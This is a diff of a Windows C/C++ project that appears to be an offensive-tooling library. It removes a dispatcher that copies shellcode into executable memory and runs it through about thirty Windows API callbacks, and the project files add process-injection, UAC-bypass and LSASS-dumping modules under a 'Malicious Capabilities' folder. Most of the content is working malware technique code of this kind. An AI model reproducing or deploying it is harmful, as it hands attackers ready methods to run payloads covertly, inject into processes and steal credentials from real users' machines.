NtQueueApcThread(hThread, GlobalGetAtomNameA, (PVOID)Alpha, (PVOID)(((DWORD64)BaseAddress) + (Position - pPayload)), (PVOID)(strlen(Position) + 1));
|
||||
}
|
||||
|
||||
QueueUserAPC((PAPCFUNC)BaseAddress, hThread, 0);
|
||||
|
||||
}
|
||||
|
||||
default:
|
||||
break;
|
||||
}
|
||||
|
||||
if (!bFlag)
|
||||
dwReturn = GetLastErrorFromTeb();
|
||||
|
||||
if (hThread)
|
||||
CloseHandle(hThread);
|
||||
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
return dwReturn;
|
||||
}
|
|
@ -1,267 +0,0 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD ShellcodeExecutionDispatchHandler(LPVOID Param)
|
||||
{
|
||||
PSHELLCODE_EXECUTION_INFORMATION Sei = (PSHELLCODE_EXECUTION_INFORMATION)Param;
|
||||
LPVOID BinAddress = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
HMODULE hModule = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, Sei->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Sei->Payload, Sei->dwLengthOfPayloadInBytes);
|
||||
|
||||
switch (Sei->MethodEnum)
|
||||
{
|
||||
case E_CDEFFOLDERMENU_CREATE2:
|
||||
{
|
||||
IContextMenu* ContextMenuRequired = NULL;
|
||||
CDefFolderMenu_Create2(NULL, NULL, 0, NULL, NULL, (LPFNDFMCALLBACK)BinAddress, 0, NULL, &ContextMenuRequired);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_CERTENUMSYSTEMSTORE:
|
||||
{
|
||||
CertEnumSystemStore(CERT_SYSTEM_STORE_CURRENT_USER, NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE)BinAddress);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_CERTENUMSYSTEMSTORELOCATION:
|
||||
{
|
||||
CertEnumSystemStoreLocation(NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE_LOCATION)BinAddress);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMCHILDWINDOWS:
|
||||
{
|
||||
EnumChildWindows(NULL, (WNDENUMPROC)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMDATEFORMATSW:
|
||||
{
|
||||
EnumDateFormatsW((DATEFMT_ENUMPROCW)BinAddress, LOCALE_SYSTEM_DEFAULT, 0);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMDESKTOPWINDOWS:
|
||||
{
|
||||
EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()), (WNDENUMPROC)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMDESKTOPSW:
|
||||
{
|
||||
EnumDesktopsW(GetProcessWindowStation(), (DESKTOPENUMPROCW)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMDIRTREEW:
|
||||
{
|
||||
WCHAR DisposeableBuffer[512] = { 0 };
|
||||
|
||||
if (!SymInitialize(InlineGetCurrentProcess, NULL, TRUE))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
EnumDirTreeW(InlineGetCurrentProcess, L"C:\\Windows", L"*.log", DisposeableBuffer, (PENUMDIRTREE_CALLBACKW)BinAddress, NULL);
|
||||
|
||||
SymCleanup(InlineGetCurrentProcess);
|
||||
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMDISPLAYMONITORS:
|
||||
{
|
||||
EnumDisplayMonitors(NULL, NULL, (MONITORENUMPROC)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMFONTFAMILIESEXW:
|
||||
{
|
||||
LOGFONTW Font = { 0 };
|
||||
Font.lfCharSet = DEFAULT_CHARSET;
|
||||
|
||||
EnumFontFamiliesExW(GetDC(NULL), &Font, (FONTENUMPROCW)BinAddress, NULL, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMFONTSW:
|
||||
{
|
||||
EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMLANGUAGEGROUPLOCALESW:
|
||||
{
|
||||
EnumLanguageGroupLocalesW((LANGGROUPLOCALE_ENUMPROCW)BinAddress, LGRPID_ARABIC, 0, 0);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMOBJECTS:
|
||||
{
|
||||
LOGFONTW Font = { 0 };
|
||||
Font.lfCharSet = DEFAULT_CHARSET;
|
||||
|
||||
EnumObjects(GetDC(NULL), OBJ_BRUSH, (GOBJENUMPROC)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMRESOURCETYPESEXW:
|
||||
{
|
||||
EnumResourceTypesExW(NULL, (ENUMRESTYPEPROCW)BinAddress, NULL, RESOURCE_ENUM_VALIDATE, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMSYSTEMCODEPAGES:
|
||||
{
|
||||
EnumSystemCodePagesW((CODEPAGE_ENUMPROCW)BinAddress, CP_INSTALLED);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMSYSTEMGEOID:
|
||||
{
|
||||
EnumSystemGeoID(GEOCLASS_NATION, 0, (GEO_ENUMPROC)BinAddress);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMSYSTEMLANGUAGEGROUPS:
|
||||
{
|
||||
EnumSystemLanguageGroupsW((LANGUAGEGROUP_ENUMPROCW)BinAddress, LGRPID_SUPPORTED, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMSYSTEMLOCALESEX:
|
||||
{
|
||||
EnumSystemLocalesEx((LOCALE_ENUMPROCEX)BinAddress, LOCALE_ALL, NULL, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMTHREADWINDOWS:
|
||||
{
|
||||
EnumThreadWindows(0, (WNDENUMPROC)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMTIMEFORMATSEX:
|
||||
{
|
||||
EnumTimeFormatsEx((TIMEFMT_ENUMPROCEX)BinAddress, LOCALE_NAME_SYSTEM_DEFAULT, TIME_NOSECONDS, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMUILANGUAGESW:
|
||||
{
|
||||
EnumUILanguagesW((UILANGUAGE_ENUMPROCW)BinAddress, MUI_LANGUAGE_ID, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMWINDOWSTATIONSW:
|
||||
{
|
||||
EnumWindowStationsW((WINSTAENUMPROCW)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMWINDOWS:
|
||||
{
|
||||
EnumWindows((WNDENUMPROC)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_MESSAGEBOXINDIRECT:
|
||||
{
|
||||
MSGBOXPARAMS MessageBoxParams = { 0 };
|
||||
MessageBoxParams.cbSize = sizeof(MSGBOXPARAMS);
|
||||
MessageBoxParams.dwStyle = MB_HELP;
|
||||
MessageBoxParams.lpfnMsgBoxCallback = (MSGBOXCALLBACK)BinAddress;
|
||||
MessageBoxParams.lpszText = L"[Unstable] Help Executes Shellcode";
|
||||
|
||||
MessageBoxIndirect(&MessageBoxParams);
|
||||
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMERATELOADEDMODULES:
|
||||
{
|
||||
EnumerateLoadedModules64(InlineGetCurrentProcess, (PENUMLOADED_MODULES_CALLBACK64)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMPAGEFILESW:
|
||||
{
|
||||
K32EnumPageFilesW((PENUM_PAGE_FILE_CALLBACKW)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_ENUMPWRSCHEMES:
|
||||
{
|
||||
EnumPwrSchemes((PWRSCHEMESENUMPROC)BinAddress, NULL);
|
||||
break;
|
||||
}
|
||||
|
||||
case E_DNSQUERYEX:
|
||||
{
|
||||
//needs to be debugged
|
||||
|
||||
/*
|
||||
DNS_QUERY_REQUEST Request = { 0 };
|
||||
DNS_QUERY_RESULT Result = { 0 };
|
||||
|
||||
Request.Version = DNS_QUERY_REQUEST_VERSION1;
|
||||
Request.QueryName = NULL;
|
||||
Request.QueryType = DNS_TYPE_A;
|
||||
Request.QueryOptions = DNS_QUERY_STANDARD;
|
||||
Request.InterfaceIndex = 0;
|
||||
Request.pQueryCompletionCallback = (PDNS_QUERY_COMPLETION_ROUTINE)BinAddress;
|
||||
|
||||
DnsQueryEx(&Request, &Result, NULL);
|
||||
*/
|
||||
|
||||
}
|
||||
|
||||
case E_RTLUSERFIBERSTART:
|
||||
{
|
||||
RTLUSERFIBERSTART RtlUserFiberStart = NULL;
|
||||
DWORD64 FiberData = NULL;
|
||||
PTEB Teb = GetTeb();
|
||||
|
||||
RtlUserFiberStart = (RTLUSERFIBERSTART)GetProcAddressW((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), L"RtlUserFiberStart");
|
||||
if (RtlUserFiberStart == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Teb->SameTebFlags |= 0b100;
|
||||
|
||||
FiberData = (DWORD64)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, 0x100);
|
||||
if (FiberData == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
*(LPVOID*)(FiberData + 0x0a8) = BinAddress;
|
||||
|
||||
__writegsqword(0x20, FiberData);
|
||||
|
||||
RtlUserFiberStart();
|
||||
|
||||
}
|
||||
|
||||
default:
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
}
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hModule)
|
||||
FreeLibrary(hModule);
|
||||
|
||||
if (BinAddress)
|
||||
VirtualFree(BinAddress, 0, MEM_RELEASE);
|
||||
|
||||
return (bFlag ? 0 : 0xffffffff);
|
||||
}
|
||||
|
||||
BOOL ShellcodeExecutionViaFunctionCallbackMain(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei)
|
||||
{
|
||||
return CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)ShellcodeExecutionDispatchHandler, Sei, INFINITE);
|
||||
}
|
|
@ -239,7 +239,7 @@
|
|||
<ClCompile Include="IsRegistryKeyValid.cpp" />
|
||||
<ClCompile Include="LdrLoadGetProcedureAddress.cpp" />
|
||||
<ClCompile Include="MemoryFindMemory.cpp" />
|
||||
<ClCompile Include="MpfExtractMaliciousPayloadFromZipFile.cpp" />
|
||||
<ClCompile Include="MpfExtractMaliciousPayloadFromZipFileNoPassword.cpp" />
|
||||
<ClCompile Include="MpfLolExecuteRemoteBinaryByAppInstaller.cpp" />
|
||||
<ClCompile Include="Main.cpp" />
|
||||
<ClCompile Include="ManualResourceDataFetching.cpp" />
|
||||
|
@ -251,8 +251,37 @@
|
|||
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
|
||||
<ClCompile Include="MpfPiControlInjection.cpp" />
|
||||
<ClCompile Include="MpfPiQueueUserAPCViaAtomBomb.cpp" />
|
||||
<ClCompile Include="MpfPiWriteProcessMemoryCreateRemoteThread.cpp" />
|
||||
<ClCompile Include="MpfProcessInjectionViaProcessReflection.cpp" />
|
||||
<ClCompile Include="ProcessInjectionMain.cpp" />
|
||||
<ClCompile Include="MpfSceViaCDefFolderMenu_Create2.cpp" />
|
||||
<ClCompile Include="MpfSceViaCertEnumSystemStore.cpp" />
|
||||
<ClCompile Include="MpfSceViaCertEnumSystemStoreLocation.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumChildWindows.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumDateFormatsW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumDesktopsW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumDesktopWindows.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumDirTreeW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumDisplayMonitors.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumerateLoadedModules64.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumFontFamiliesExW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumFontsW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumLanguageGroupLocalesW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumObjects.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumPwrSchemes.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumResourceTypesExW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumSystemCodePagesW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumSystemGeoID.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumSystemLanguageGroupsW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumSystemLocalesEx.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumThreadWindows.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumTimeFormatsEx.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumUILanguagesW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumWindows.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumWindowStationsW.cpp" />
|
||||
<ClCompile Include="MpfSceViaK32EnumPageFilesW.cpp" />
|
||||
<ClCompile Include="MpfSceViaMessageBoxIndirectW.cpp" />
|
||||
<ClCompile Include="ProxyRegisterWaitLoadLibrary.cpp" />
|
||||
<ClCompile Include="ProxyWorkItemLoadLibrary.cpp" />
|
||||
<ClCompile Include="RemoveDescriptorEntry.cpp" />
|
||||
|
|
|
@ -70,6 +70,15 @@
|
|||
<Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection">
|
||||
<UniqueIdentifier>{afb1a792-4365-4fb2-ae74-b93768c98289}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution">
|
||||
<UniqueIdentifier>{705254d6-86d7-47f6-a661-dd4430493a93}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\UAC Bypasses">
|
||||
<UniqueIdentifier>{82ab4698-4174-47b8-8b36-47e02ab01766}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\LSASS Dumping">
|
||||
<UniqueIdentifier>{182eb745-5d27-4728-bd5e-030c4df5b57a}</UniqueIdentifier>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="Main.cpp">
|
||||
|
@ -321,9 +330,6 @@
|
|||
<ClCompile Include="CreateFileFromDsCopyFromSharedFile.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="UacBypassFodHelperMethod.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="DelayedExecutionExecuteOnDisplayOff.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
|
@ -378,18 +384,12 @@
|
|||
<ClCompile Include="GetPidFromEnumProcesses.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetPidFromPidBruteForcing.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="TryLoadDllMultiMethod.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetPidFromNtQueryFileInformation.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
|
||||
</ClCompile>
|
||||
|
@ -399,12 +399,6 @@
|
|||
<ClCompile Include="CreateThreadAndWaitForCompletion.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ShellcodeExecutionViaFunctionCallbackMain.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfComMonitorChromeSessionOnce.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
|
@ -543,18 +537,120 @@
|
|||
<ClCompile Include="MpfProcessInjectionViaProcessReflection.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ProcessInjectionMain.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MemoryFindMemory.cpp">
|
||||
<Filter>Source Files\String Manipulation</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MiscGenericShellcodePayloads.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfExtractMaliciousPayloadFromZipFile.cpp">
|
||||
<ClCompile Include="MpfPiWriteProcessMemoryCreateRemoteThread.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfPiQueueUserAPCViaAtomBomb.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfPiControlInjection.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ShellcodeExecutionViaFunctionCallbackMain.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="UacBypassFodHelperMethod.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\UAC Bypasses</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\LSASS Dumping</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\LSASS Dumping</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\LSASS Dumping</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfExtractMaliciousPayloadFromZipFileNoPassword.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumChildWindows.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaCDefFolderMenu_Create2.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaCertEnumSystemStore.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaCertEnumSystemStoreLocation.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumDateFormatsW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumDesktopWindows.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumDesktopsW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumDirTreeW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumDisplayMonitors.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumFontFamiliesExW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumFontsW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumLanguageGroupLocalesW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumObjects.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumResourceTypesExW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumSystemCodePagesW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumSystemGeoID.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumSystemLanguageGroupsW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumSystemLocalesEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumThreadWindows.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumTimeFormatsEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumUILanguagesW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumWindowStationsW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumWindows.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumerateLoadedModules64.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaK32EnumPageFilesW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumPwrSchemes.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaMessageBoxIndirectW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -38,72 +38,6 @@
|
|||
#define InlineGetCurrentThread ((HANDLE)(LONG_PTR)-2)
|
||||
#define InlineGetCurrentProcess (HANDLE)((HANDLE)-1)
|
||||
|
||||
|
||||
/*******************************************
|
||||
SHELLCODE VIA CALLBACK ROUTINE INFORMATION
|
||||
*******************************************/
|
||||
|
||||
/*
|
||||
|
||||
LPBYTE Payload
|
||||
a pointer to shellcode
|
||||
DWORD dwLengthOfPayloadInBytes
|
||||
the length of the payload in bytes
|
||||
Enum SHELLCODE_EXECUTION_METHOD
|
||||
specifies shellcode execution method
|
||||
|
||||
|
||||
example:
|
||||
SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
|
||||
Sei.Payload = Shellcode; //pointer to shellcode
|
||||
Sei.dwLengthOfPayloadInBytes = 280; //whatever the length is
|
||||
Sei.Method = E_CERTENUMSYSTEMSTORE; //method from SHELLCODE_EXECUTION_METHOD
|
||||
*/
|
||||
|
||||
typedef enum SHELLCODE_EXECUTION_METHOD {
|
||||
E_CDEFFOLDERMENU_CREATE2 = 1,
|
||||
E_CERTENUMSYSTEMSTORE, //2
|
||||
E_CERTENUMSYSTEMSTORELOCATION, //3
|
||||
E_CERTFINDCHAININSTORE, //4 UNSTABLE, FAILS
|
||||
E_ENUMCHILDWINDOWS, //5
|
||||
E_ENUMDATEFORMATSW, //6
|
||||
E_ENUMDESKTOPWINDOWS, //7
|
||||
E_ENUMDESKTOPSW, //8
|
||||
E_ENUMDIRTREEW, //9
|
||||
E_ENUMDISPLAYMONITORS, //10
|
||||
E_ENUMFONTFAMILIESEXW, //11
|
||||
E_ENUMFONTSW, //12
|
||||
E_ENUMICMPROFILESW, //13 UNSTABLE, FAILS
|
||||
E_ENUMLANGUAGEGROUPLOCALESW, //14
|
||||
E_ENUMOBJECTS, //15
|
||||
E_ENUMPROPSEXW, //16 NOT IMPLEMENTED!
|
||||
E_ENUMRESOURCETYPESEXW, //17
|
||||
E_ENUMSYSTEMCODEPAGES, //18
|
||||
E_ENUMSYSTEMGEOID, //19
|
||||
E_ENUMSYSTEMLANGUAGEGROUPS, //20
|
||||
E_ENUMSYSTEMLOCALESEX, //20
|
||||
E_ENUMTHREADWINDOWS, //21
|
||||
E_ENUMTIMEFORMATSEX, //22
|
||||
E_ENUMUILANGUAGESW, //23
|
||||
E_ENUMWINDOWSTATIONSW, //24
|
||||
E_ENUMWINDOWS, //25
|
||||
E_ENUMPROPSW, //26 UNSTABLE, FAILS
|
||||
E_MESSAGEBOXINDIRECT, //27 UNSTABLE, FAILS
|
||||
E_PERFSTARTPROVIDEREX, //28 UNSTABLE, FAILS
|
||||
E_MINIDUMPWRITEDUMP, //29 UNSTABLE, FAILS
|
||||
E_ENUMERATELOADEDMODULES, //30
|
||||
E_ENUMPAGEFILESW, //31
|
||||
E_ENUMPWRSCHEMES, //32
|
||||
E_DNSQUERYEX, //33
|
||||
E_RTLUSERFIBERSTART //34 UNSTABLE, FAILS
|
||||
}SHELLCODE_EXECUTION_METHOD, *PSHELLCODE_EXECUTION_METHOD;
|
||||
|
||||
typedef struct __SHELLCODE_EXECUTION_INFORMATION {
|
||||
LPBYTE Payload;
|
||||
DWORD dwLengthOfPayloadInBytes;
|
||||
DWORD MethodEnum;
|
||||
}SHELLCODE_EXECUTION_INFORMATION, * PSHELLCODE_EXECUTION_INFORMATION;
|
||||
|
||||
/*******************************************
|
||||
RAD HARDWARE BREAKPOINT HOOKING ENGINE DATA
|
||||
*******************************************/
|
||||
|
@ -129,53 +63,6 @@ inline CRITICAL_SECTION CriticalSection = { 0 };
|
|||
inline DESCRIPTOR_ENTRY* Head = NULL;
|
||||
inline HARDWARE_ENGINE_INIT_SETTINGS_GLOBAL GlobalHardwareBreakpointObject;
|
||||
|
||||
/*******************************************
|
||||
PROCESS INJECTION INFORMATION
|
||||
*******************************************/
|
||||
|
||||
/*
|
||||
|
||||
LPBYTE Payload
|
||||
a pointer to shellcode
|
||||
DWORD dwLengthOfPayloadInBytes
|
||||
the length of the payload in bytes
|
||||
Enum PROCESS_INJECTION_METHOD
|
||||
specifies process injection method
|
||||
